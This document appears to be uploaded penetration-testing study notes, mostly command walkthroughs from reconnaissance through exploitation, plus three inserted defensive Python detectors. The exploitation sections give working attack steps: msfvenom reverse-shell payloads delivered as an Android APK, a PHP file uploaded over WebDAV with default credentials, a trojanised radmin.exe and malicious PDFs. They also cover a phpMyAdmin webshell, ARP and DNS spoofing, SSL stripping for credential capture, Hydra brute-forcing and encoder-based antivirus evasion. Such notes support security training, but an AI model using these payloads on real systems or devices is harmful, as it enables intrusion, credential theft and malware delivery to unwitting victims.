Sample

This document provides information on tools and techniques for reconnaissance, vulnerability scanning, and exploitation. It discusses using tools like Maltego, Nmap, Nikto, Cadaver, Wireshark, and Metasploit to gather open source intelligence, scan for vulnerabilities, analyze network traffic, upload payloads, and create reverse shells on target systems. The summary focuses on the high-level goal of each major section.

Uploaded by Bryle Drio

1. Pre-engagement

###############################################################################
2. Information Gathering

**OSINT**

InSpy
--How to use it?
1. inspy "Company Name" --empspy /usr/share/inspy/wordlists/title-list-large.txt

Recon-ng
Search for additional subdomains
1. use recon/hosts/gather/http/web/google_site
2. set DOMAIN cryptors.org
3. run
Search for XSS
1. use recon/hosts/enum/http/web/xssed

-NETCRAFT
--How to use it?
---1. Go to www.netcraft.com
---2. Enter the target website
--What does it do?
---1. Provide publicly available info about the target such as
----1. Hosting Provider
----2. Domain Provider
----3. Web Server
----4. Uptime Logs
----5. Queries about the software they are using

-WHOIS LOOKUPS
--How to use it?
---1. Open terminal and type: whois targetWebsite.com
--What does it do?
---1. Provides information about the website owner, including contact info
---2. Provides the target's hosting and domain provider information

-DNS Reconnaissance
dnsenum cryptors.org
host -t ns cryptors.org
host -t mx cryptors.org

--NSLOOKUP
---How to use it #1?
----1. Open terminal and type: nslookup www.target.com
---What does it do?
----1. It will return the IP address of the target and website name
---How to use it #2?
----1. nslookup
----2. set type=mx
----3. target.com
---What does it do?
----1. It will return the mail servers of the target

--HOST
---How to use it?
----1. host -t ns target.com
---What does it do?
----1. Give us the name servers for the target

--ZONE TRANSFER
---How to use it?
----1. host -l domainToTransfer.com nameServer.com
---What does it do?
----1. It asks the name server for a full copy of the domain's DNS records (an AXFR zone transfer); this only works when the server allows transfers from any host, which is a misconfiguration you should fix on your own name servers by restricting transfers to your secondaries

-Searching For Email Addresses

--THEHARVESTER
---How to use it?
----1. theharvester -d target.com -b google
---What does it do?
----1. It lists the email addresses found for the target domain and its subdomains in the selected data source

-MALTEGO
--How to use it?
---1. Search for the Maltego app in Kali Linux
---2. Select Domain as the target
---3. Run transforms based on your needs
--What does it do?
---1. Provides DNS information
---2. Provides a list of email addresses in the company
---3. Provides a list of phone numbers in the company
---4. Provides a list of publicly available files in the company
---5. Gives an illustrative, graphical view of the company

**PORT SCANNING**

-MANUAL PORT SCANNING

--NETCAT
---How to use it?
----1. nc -vv 192.168.0.10 21
---What does it do?
----1. -vv enables very verbose output, showing the details of each step of the connection
----2. 192.168.0.10 is your target IP address
----3. 21 is the port number of your target

-PORT SCANNING WITH NMAP

--NMAP SYN Scan

---How to use it?
----1. nmap -sS 192.168.20.10-12 -oA filename
---What does it do?
----1. -sS stands for SYN scan; it reports the open ports
----2. -oA writes the results to files in all three formats (filename.nmap, filename.gnmap and filename.xml)
----3. It also tells us which service is normally associated with each open port (by port number, not by probing the service)
----4. This scan is quieter than a full connect scan because the TCP handshake is never completed, so many services never log the connection.

--NMAP Version Scan

---How to use it?
----1. nmap -sV 192.168.20.10-12 -oA filename
---What does it do?
----1. It probes each open port and reports the name and version of the software running on it

--NMAP UDP Scan

---How to use it?
----1. nmap -sU 192.168.20.10-12 -oA filename
---What does it do?
----1. It scans the target's UDP ports; UDP is connectionless, so Nmap has to infer the port state from the reply
----2. If the port sends back a UDP response, it is open
----3. If an ICMP Port Unreachable message comes back, it is closed
----4. If nothing comes back, Nmap reports open|filtered: the port is most likely filtered, but it may be open with a service that simply does not answer Nmap's probe

--Scanning a Specific Port

--How to use it?
---1. nmap -sS -p 3232 192.168.20.10
--What does it do?
---1. It SYN scans port 3232 only
---2. You can change -sS to -sV to version scan port 3232
---3. You can change 3232 to whatever port you want to scan
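To make the -oA output above useful after the scan, here is an added example (not from the original notes) that parses the grepable filename.gnmap file into a per-host port list and compares it against an allowlist of expected services, which is how a defender turns a scan into an exposure report. The scan data, hosts and versions are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of nmap's grepable output (the filename.gnmap file written by -oA).
# Not a real scan result; hosts and versions are made up for illustration.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sS -sV 192.168.20.10-12 -oA filename
Host: 192.168.20.10 ()\tStatus: Up
Host: 192.168.20.10 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 8.9/, 80/open/tcp//http//Apache httpd 2.4.52/\tIgnored State: closed (997)
Host: 192.168.20.11 ()\tStatus: Up
Host: 192.168.20.11 ()\tPorts: 445/open/tcp//microsoft-ds///, 3232/filtered/tcp//unknown///\tIgnored State: closed (998)
Host: 192.168.20.12 ()\tStatus: Down
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\t(.*)$")

def parse_gnmap(text):
    """Return {ip: [(port, proto, state, service, version), ...]} for every host with a Ports field."""
    results = defaultdict(list)
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines, blank lines
        ip, _hostname, rest = m.groups()
        for field in rest.split("\t"):
            if not field.startswith("Ports: "):
                continue  # "Status:" and "Ignored State:" fields
            for entry in field[len("Ports: "):].split(", "):
                # Each entry is port/state/proto/owner/service/rpc/version/ (nmap writes any
                # "/" inside a version string as "|", so a plain split is safe)
                p = entry.split("/")
                results[ip].append((int(p[0]), p[2], p[1], p[4], p[6]))
    return dict(results)

def open_ports(text):
    """Flatten to a sorted list of (ip, port, service) for open ports only."""
    return sorted((ip, port, service)
                  for ip, entries in parse_gnmap(text).items()
                  for port, _proto, state, service, _ver in entries if state == "open")

def unexpected_exposure(text, allowed):
    """Open ports not listed in allowed ({ip: {port, ...}}); a host missing from allowed has nothing allowed."""
    return [(ip, port, service) for ip, port, service in open_ports(text)
            if port not in allowed.get(ip, set())]
```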

###############################################################################

3. Threat Modeling

###############################################################################

4. Vulnerability Analysis

-NIKTO
--How to use it?
---1. nikto -h websiteOrIpAddressOfTarget
--What does it do?
---1. It scans the website for possible vulnerabilities

-CADAVER
--How to use it?
---1. Check if the target website has WebDAV by entering http://website/webdav in the browser
---2. WebDAV allows clients to perform remote web content operations such as creating, changing and moving documents on a server
---3. If the page shows "WebDav Test Page", you can use cadaver
---4. cadaver http://192.168.100.117/webdav
---5. It will now give you a username and password prompt. The default username and password is wampp:xampp
--What does it do?
---1. It gives you access to the server's WebDAV share, where you can do pretty much anything.

WIRESHARK
--How to use it?
---1. Click Capture and choose an interface (eth0, wlan0)
---2. Uncheck Promiscuous Mode, then Start
---3. Make an FTP connection to the target
---4. Filter the capture by typing "ftp" in the filter box
---5. We can also use ip.dst==192.168.100.117 to show only packets sent to this destination IP
---6. Filters can be combined with &&:
ip.dst==192.168.100.117 && ftp
---7. We can see the username and password, which FTP sends in cleartext, by using Follow TCP Stream
----1. Right-click the start of the transaction
----2. Click Follow
----3. Click TCP Stream
----4. It shows the whole conversation, including the username and password

ARP
--How to use it?
---1. Just type: arp
--What does it do?
---1. It shows the ARP cache on your machine

View the ARP Broadcast

--1. Restart the Wireshark capture and use the anonymous login to interact with the Ubuntu target's FTP server again
--2. Use the arp filter to see the ARP broadcast from the Kali machine and the reply from the Ubuntu machine with its MAC address
--3. Run arp again in your terminal to see that the Ubuntu target has been added to your ARP cache

IP Forwarding
--1. THIS IS NEEDED BEFORE CONDUCTING ARP CACHE POISONING
--2. echo 1 > /proc/sys/net/ipv4/ip_forward

ARP Cache Poisoning with Arpspoof

--1. Type: arp -a (to note the original MAC addresses in the ARP cache before the poisoning)
--2. Type: arpspoof -i wlan0 -t 192.168.0.105 192.168.0.106
--3. Type: arpspoof -i wlan0 -t 192.168.0.106 192.168.0.105
--4. Type: arp -a (again, to see that their MAC addresses have been changed to yours)
--5. You can use Wireshark to see the exchange of data (using an FTP connection from Linux to XP)

ARP Cache Poisoning to Impersonate the Default Gateway

--1. Type: arpspoof -i wlan0 -t 192.168.0.105 192.168.0.1
--2. Type: arpspoof -i wlan0 -t 192.168.0.1 192.168.0.105
--3. Try to Google "Alexis Pogi" using the target's browser
--4. Use Wireshark with the http filter: you can see the query "Alexis Pogi"
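The poisoning in the two arpspoof sections above leaves a visible trace on the LAN: the gateway's IP suddenly answers from a different MAC, and one MAC claims several IPs. The following is an added detection example (not part of the original notes) that applies those two checks to a constructed sequence of ARP replies; the reply list, IPs and MACs are made up.

```python
from collections import defaultdict

# Constructed sequence of ARP "is-at" replies (sender IP, sender MAC) in the order a
# sniffer on the LAN would see them while the arpspoof commands above are running.
# Addresses are made up; this is not a real capture.
ARP_REPLIES = [
    ("192.168.0.1",   "aa:aa:aa:aa:aa:01"),  # default gateway, legitimate
    ("192.168.0.105", "bb:bb:bb:bb:bb:05"),  # target host, legitimate
    ("192.168.0.106", "cc:cc:cc:cc:cc:06"),  # unrelated host
    ("192.168.0.1",   "dd:dd:dd:dd:dd:99"),  # attacker's MAC claiming the gateway IP
    ("192.168.0.105", "dd:dd:dd:dd:dd:99"),  # attacker's MAC claiming the target IP
    ("192.168.0.1",   "dd:dd:dd:dd:dd:99"),  # arpspoof keeps resending every few seconds
]

def detect_arp_spoof(replies, gateway_ip, known=None):
    """Return de-duplicated alert strings.

    known: optional {ip: mac} baseline (e.g. from a DHCP lease table). Without it the
    first MAC seen for an IP is trusted, which an attacker who replies first can abuse."""
    baseline = {ip: mac.lower() for ip, mac in (known or {}).items()}
    ips_per_mac = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        ips_per_mac[mac].add(ip)
        if ip not in baseline:
            baseline[ip] = mac
            continue
        if baseline[ip] != mac:
            # the IP is now answered by a different MAC: the classic poisoning symptom
            sev = "CRITICAL" if ip == gateway_ip else "WARNING"
            msg = f"{sev}: {ip} moved from {baseline[ip]} to {mac}"
            if msg not in alerts:
                alerts.append(msg)
        if len(ips_per_mac[mac]) > 1:
            # one MAC answering for several IPs is exactly what the two arpspoof commands produce
            msg = f"INFO: {mac} now claims {sorted(ips_per_mac[mac])}"
            if msg not in alerts:
                alerts.append(msg)
    return alerts
```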

DNS Cache Poisoning

--1. service apache2 start
--2. cat hosts.txt (192.168.1.9 www.gmail.com)
--3. dnsspoof -i wlan0 -f hosts.txt
--4. nslookup www.gmail.com

Using ETTERCAP for SSL MITM

--1. ettercap -Ti wlan0 -M arp:remote /192.168.1.1// /192.168.1.9//
--2. ettercap is the tool for MITM
--3. -T selects the text-based interface and -i wlan0 the interface to use
--4. -M arp:remote /default gateway// /target// sets up an ARP cache poisoning attack between the default gateway and the target
--5. Open facebook.com on the target OS and log in
--6. Look at your terminal and search for "PASS"; you can see the login username and password

SSL Stripping
--1. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
--2. sslstrip -l 8080
--3. ettercap -Ti wlan0 -M arp:remote /192.168.1.1// /192.168.1.9//

###############################################################################
5. Exploitation

-Hacking Android Phone Using Metasploit

--How to use it?
---1. Create a payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=yourIp LPORT=unusedPort R > name.apk
---2. Open Metasploit
msfconsole
---3. Use the multi handler exploit
use multi/handler
---4. Use the same settings as your payload
set payload android/meterpreter/reverse_tcp
set LHOST yourIp
set LPORT unusedPort
---5. Execute the exploit
exploit
---6. Send the apk file to the target and have them download and open it.
(This works only if you are on the same network, since the payload connects back to LHOST)
--What does it do?
---1. It gives you a Meterpreter session on the target's Android phone

CADAVER
--1. cadaver http://192.168.1.4/webdav
--2. wampp:xampp username and pass
--3. put test.txt (To upload file)
--4. put test.php (To upload scripts)

Uploading meterpreter PHP Payload in WebDav

--1. Create the payload using msfvenom
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=2323 -f raw > meterpreter.php
--2. Log in with cadaver again
--3. put meterpreter.php (uploads meterpreter.php)
--4. Open Metasploit
--5. use multi/handler
--6. set payload php/meterpreter/reverse_tcp
--7. set LHOST 192.168.1.19 && set LPORT 2323
--8. exploit (it will start to listen)
--9. Open meterpreter.php in the browser by going to http://192.168.1.4/webdav/meterpreter.php
--10. A session will be opened.

Exploiting Open phpMyAdmin

--1. Go to http://192.168.1.4/phpmyadmin
--2. Click the SQL tab
--3. Enter this:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"
(This only works when the database account has the FILE privilege and secure_file_priv does not restrict where the server may write)
--4. Opening shell.php on its own gives an error because no cmd parameter was specified
--5. Add to the URL:
?cmd=ipconfig

Creating Wordlist Using CRUNCH

--1. crunch 3 3 abc -o crunch.txt (every 3-character combination of the letters a, b and c, written to crunch.txt)

Online Password Cracking with HYDRA

--1. Create a password list in passwordfile.txt
--2. hydra -l georgia -P passwordfile.txt 192.168.1.4 ftp (-l is the single username to try, -P the password list; every guess is a real FTP login attempt, so the server's log records each failure)
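Each guess hydra makes against the FTP service is a failed login in the server's log, which is how the defender sees the attack. The following added example (not from the original notes) counts failures per client within a sliding window and flags a success that follows a burst, the sign that the password was guessed; the log lines are constructed in the style of vsftpd's vsftpd.log.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed log lines in the style of vsftpd's vsftpd.log (not a real log). The first
# client hammers the "georgia" account and then gets in; the second is a normal typo.
SAMPLE_LOG = """\
Sun Mar 10 12:00:00 2024 [pid 2001] CONNECT: Client "192.168.1.19"
Sun Mar 10 12:00:01 2024 [pid 2001] [georgia] FAIL LOGIN: Client "192.168.1.19"
Sun Mar 10 12:00:01 2024 [pid 2003] [georgia] FAIL LOGIN: Client "192.168.1.19"
Sun Mar 10 12:00:02 2024 [pid 2005] [georgia] FAIL LOGIN: Client "192.168.1.19"
Sun Mar 10 12:00:02 2024 [pid 2007] [georgia] FAIL LOGIN: Client "192.168.1.19"
Sun Mar 10 12:00:03 2024 [pid 2009] [georgia] FAIL LOGIN: Client "192.168.1.19"
Sun Mar 10 12:00:03 2024 [pid 2011] [georgia] OK LOGIN: Client "192.168.1.19"
Sun Mar 10 12:05:00 2024 [pid 2013] [alice] FAIL LOGIN: Client "192.168.1.50"
Sun Mar 10 12:05:30 2024 [pid 2015] [alice] OK LOGIN: Client "192.168.1.50"
"""

LOGIN_RE = re.compile(
    r'^(\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[([^\]]+)\] (OK|FAIL) LOGIN: Client "([\d.]+)"')

def parse_logins(text):
    """Yield (timestamp, user, success, client_ip) for login result lines; other lines are skipped."""
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            yield datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y"), m.group(2), m.group(3) == "OK", m.group(4)

def detect_bruteforce(text, threshold=5, window_s=60):
    """Return {client_ip: {"failures": n, "users": set, "success_after_burst": bool}}
    for clients with at least `threshold` failed logins inside any `window_s` seconds."""
    recent = defaultdict(deque)   # client_ip -> timestamps of failures still inside the window
    flagged = {}
    for ts, user, success, ip in parse_logins(text):
        q = recent[ip]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()           # drop failures that have aged out of the window
        if not success:
            q.append(ts)
            if len(q) >= threshold:
                entry = flagged.setdefault(ip, {"failures": 0, "users": set(), "success_after_burst": False})
                entry["failures"] = max(entry["failures"], len(q))
                entry["users"].add(user)
        elif ip in flagged and q:
            # a successful login while the burst is still inside the window: password probably guessed
            flagged[ip]["success_after_burst"] = True
    return flagged
```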

Bypassing Filters

Try All Ports in METASPLOIT

--1. use exploit/windows/smb/ms08_067_netapi
--2. set payload windows/shell/reverse_tcp_allports
--3. exploit -j

Exploiting PDF using METASPLOIT

--1. use exploit/windows/fileformat/adobe_utilprintf
--2. exploit
--3. cp /root/.msf4/local/msf.pdf /var/www/html
--4. service apache2 start
--5. use multi/handler
--6. set payload windows/meterpreter/reverse_tcp
--7. set LHOST 192.168.1.19
--8. exploit
--9. Wait until msf.pdf is opened on the target

Embed Executable inside a PDF using METASPLOIT

--1. use exploit/windows/fileformat/adobe_pdf_embedded_exe
--2. set INFILENAME /usr/share/set/readme/User_Manual.pdf
--3. set payload windows/meterpreter/reverse_tcp
--4. set LHOST 192.168.1.19
--5. exploit
--6. use multi/handler
--7. set payload windows/meterpreter/reverse_tcp
--8. exploit
--9. service apache2 start
--10. cp /root/.msf4/local/evil.pdf /var/www/html
--11. Wait until evil.pdf is opened on the target

SOCIAL ENGINEERING TOOLKIT (Email Attacks and Web Attacks)

--1. setoolkit

Installing TROJAN using METASPLOIT

--1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe
--2. msfconsole
--3. use multi/handler
--4. set payload windows/meterpreter/reverse_tcp
--5. set LHOST and LPORT, then exploit
--6. Execute radmin.exe on the target to get Meterpreter access

Bypassing Antivirus using ENCODERS in MSFVENOM

--1. msfvenom -l encoders
--2. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe
--3. Upload it to VirusTotal to check (it will still be detected, because shikata_ga_nai alone is not enough)
--4. Combine shikata_ga_nai and x86/bloxor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw > meterpreterencoded.bin
msfvenom -p - -f exe -a x86 --platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin
--5. Try it also on our radmin.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > radminencoded.exe

###############################################################################
6. Post Exploitation

###############################################################################
7. Reporting
